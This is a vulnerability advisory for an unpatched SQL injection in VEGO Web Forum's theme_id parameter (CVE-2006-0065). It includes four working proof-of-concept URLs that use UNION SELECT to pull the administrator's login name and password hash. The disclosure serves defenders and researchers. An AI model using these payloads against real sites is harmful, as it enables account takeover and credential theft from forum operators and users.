SQL Injection Vulnerability in VEGO Web Forum

Summary

Vulnerability: SQL Injection Vulnerability in VEGO Web Forum
Discovered: 2005.12.28
Last Update: n/a
ID: EV0001
CVE: CVE-2006-0065
Risk Level: medium
Type: SQL Injection
Status: Unpatched
Vendor: VEGO (http://alas.matf.bg.ac.yu/~mr99067)
Vulnerable Software: VEGO Web Forum
Version: 1.26 and earlier
PoC/Exploit: Available
Solution: Not available
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)

Description

A SQL injection vulnerability was found in the VEGO Web Forum script.

Vulnerable scripts:

  • php/functions.php
  • php/functions_update.php
  • php/functions_display.php

The theme_id request parameter is not validated or escaped before it is placed in a SQL query, so an attacker can append arbitrary SQL to the statement the script intended to run. The PoC below uses a UNION SELECT to read rows from the vwf_users table through the theme page: the injected SELECT has to match the column count of the original query (five columns in version 1.26, four in earlier versions), and the trailing /* comments out whatever the script appends after the parameter.

The administrator's login name and password hash can be read this way, which puts the administrator account at risk.

PoC/Exploit

Administrator's login name:

For version 1.26:
http://hostname/webforum/index.php?theme_id=-1%20union%20select%201,2,name,4,5%20from%20vwf_users%20where%20userid=1/*

Earlier versions:
http://hostname/temp/_1/webforum/index.php?theme_id=-1%20union%20select%201,2,name,4%20from%20vwf_users%20where%20userid=1/*

Hash of administrator's password:

For version 1.26:
http://hostname/webforum/index.php?theme_id=-1%20union%20select%201,2,pass,4,5%20from%20vwf_users%20where%20userid=1/*

Earlier versions:
http://hostname/temp/_1/webforum/index.php?theme_id=-1%20union%20select%201,2,pass,4%20from%20vwf_users%20where%20userid=1/*

Solution

No fix for "SQL Injection Vulnerability in VEGO Web Forum" is available. Check the VEGO website for updates.